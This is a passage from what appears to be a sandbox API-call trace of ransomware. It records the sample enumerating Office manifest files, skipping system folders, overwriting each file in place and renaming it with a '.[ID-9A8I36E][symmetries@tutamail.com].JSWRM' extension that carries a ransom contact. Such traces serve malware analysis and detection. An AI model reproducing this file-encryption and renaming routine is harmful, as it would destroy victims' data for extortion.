CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0072.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0072.450] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.450] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0072.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.450] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.451] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.451] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.451] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.546] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.546] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.547] CloseHandle (hObject=0x458) returned 1 [0072.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0072.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0072.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0072.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0072.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0072.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.547] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.547] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.547] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0072.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0072.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.548] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e0e651, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e0e651, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cAlternateFileName="APEF10~1.XML")) returned 1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.548] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0072.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.548] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0072.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0072.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0072.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.549] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.549] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.549] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.549] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.551] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.551] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.551] CloseHandle (hObject=0x458) returned 1 [0072.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0072.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0072.551] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0072.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0072.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0072.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.552] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0072.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.552] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x863, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cAlternateFileName="AP5F49~1.XML")) returned 1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.552] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.553] lstrcmpiW (lpString1="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0072.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0072.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0072.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.553] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0072.553] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.553] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=2147) returned 1 [0072.553] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x860) returned 0x23fc98 [0072.553] ReadFile (in: hFile=0x458, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ef6c*=0x860, lpOverlapped=0x0) returned 1 [0072.555] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.555] WriteFile (in: hFile=0x458, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ef68*=0x860, lpOverlapped=0x0) returned 1 [0072.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0072.555] CloseHandle (hObject=0x458) returned 1 [0072.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0072.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0072.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0072.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.556] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83ea71ba, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83ea71ba, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x863, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", cAlternateFileName="APB0FE~1.XML")) returned 1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.556] lstrcmpiW (lpString1="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.556] lstrcmpiW 